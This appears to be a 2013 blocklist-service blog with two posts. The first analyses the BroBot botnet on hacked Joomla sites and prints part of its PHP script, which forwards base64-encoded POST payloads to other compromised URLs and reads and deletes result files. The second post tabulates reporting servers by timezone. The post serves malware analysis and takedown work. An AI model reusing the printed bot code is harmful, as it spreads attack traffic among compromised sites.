2013
03.22

In the last Days, the BroBot Runners runs a new Wave with and send POST-Requests with c_id to the hacked Sites.

The Data (base64_encoded) has the following Skript/Data:

brobot-runners

 

The Script calls in each Post-Request 140 to 180 others hacked URLs:

 

brobot-runners2

 


....
function send($target){
forkill();
if(strpos($target,$_SERVER["SERVER_NAME"]) !== false){
global $code;
}    else{
$code = $_REQUEST["c_id"];
}
if(!preg_match("/http/i",$target))
$target = "http://$target";
$parts = @parse_url($target);
$host = $parts["host"];
$path = $parts["path"];
if($path=="")$path="/";
$data = @http_build_query(array("c_id" => $code ,'gnu[]' => 'base64_decode', "fr" => $_REQUEST["fr"], "ksess" => $_REQUEST["ksess"]));
$request = "POST $path HTTP/1.1\r\n"
."Host: $host\r\n"
."User-Agent: Mozilla/5.0 Firefox/3.6.12\r\n"
."Accept: */*\r\n"
."Accept-Language: en-us,en;q=0.5\r\n"
."Accept-Encoding: deflate\r\n"
."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
."Content-type: application/x-www-form-urlencoded\r\n"
."Content-Length: ".strlen($data)."\r\n"
."Connection: Close\r\n"
."Cache-Control: no-cache\r\n\r\n{$data}";
forkill();
$fp = @fsockopen($host, 80);
@stream_set_timeout($fp, 3000);
@fwrite($fp, $request);
@stream_set_blocking($fp, 0);
return $fp;
}
if((isset($_REQUEST["rf"]) && $_REQUEST["rf"] == 1) || $_REQUEST["fr"] == 1){
echo @implode("", @file(writabledir()."/res"."2eb7e37x28e"));
@unlink(writabledir()."/res"."2ebx839d1fb28e");
flush();
}
$fn = lock();
....

 

We have found currently 3357 URLs with hacked Joomlas/Sites.

Over 2.500 Script/URLs are online. In the next days, we look to report the Site to Bank of America or directly to the Hoster to check and fix the site.

We will analysed in the next Days the complete PHP-Code and write a little bit what is not good and can be make better 🙂

If you want to get the complete code, please contact us.

-google-ads-
2013
03.19

The Servers which send Reports to blocklist and their Timezones/Locations

We have currently the following Servers with the following Timezones (Location):

Count Timezone (Order by Count, desc):

662 Europe/Berlin
29 Europe/London
26 Europe/Amsterdam
25 Europe/Zurich
18 Europe/Vienna
18 Europe/Paris
15 Europe/Rome
13 Europe/Copenhagen
11 GMT+0000
10 America/Los_Angeles
8 America/New_York
7 Europe/Madrid
5 Europe/Helsinki
5 America/Chicago
4 Pacific/Auckland
4 America/Toronto
4 Asia/Kolkata
3 Asia/Vientiane
3 Asia/Tehran
3 Australia/Sydney
3 Europe/Moscow
3 Europe/Prague
2 Europe/Riga
2 America/Phoenix
2 Europe/Bratislava
2 Australia/Brisbane
2 Asia/Manila
2 Asia/Jakarta
1 Europe/Istanbul
1 Europe/Bucharest
1 Australia/Hobart
1 Europe/Luxembourg
1 America/Mexico_City
1 Europe/Lisbon
1 America/Montreal
1 Europe/Ljubljana
1 Asia/Bangkok
1 Asia/Shanghai
1 America/Denver
1 Europe/Warsaw
1 Asia/Singapore
1 Asia/Hong_Kong
1 Europe/Volgograd
1 America/Sao_Paulo
1 Europe/Kiev
1 Asia/Brunei
1 Europe/Athens

 

Count Timezone (Order by Timezone asc):

 

5 America/Chicago
1 America/Denver
10 America/Los_Angeles
1 America/Mexico_City
1 America/Montreal
8 America/New_York
2 America/Phoenix
1 America/Sao_Paulo
4 America/Toronto
1 Asia/Bangkok
1 Asia/Brunei
1 Asia/Hong_Kong
2 Asia/Jakarta
4 Asia/Kolkata
2 Asia/Manila
1 Asia/Shanghai
1 Asia/Singapore
3 Asia/Tehran
3 Asia/Vientiane
2 Australia/Brisbane
1 Australia/Hobart
3 Australia/Sydney
26 Europe/Amsterdam
1 Europe/Athens
662 Europe/Berlin
2 Europe/Bratislava
1 Europe/Bucharest
13 Europe/Copenhagen
5 Europe/Helsinki
1 Europe/Istanbul
1 Europe/Kiev
1 Europe/Lisbon
1 Europe/Ljubljana
29 Europe/London
1 Europe/Luxembourg
7 Europe/Madrid
3 Europe/Moscow
18 Europe/Paris
3 Europe/Prague
2 Europe/Riga
15 Europe/Rome
18 Europe/Vienna
1 Europe/Volgograd
1 Europe/Warsaw
25 Europe/Zurich
11 GMT+0000
4 Pacific/Auckland

 

Old Servers which have no Location/Timezone or never send Reports from Service which has no Timezone in the Logs, was not listed here.

-google-ads-
Translate »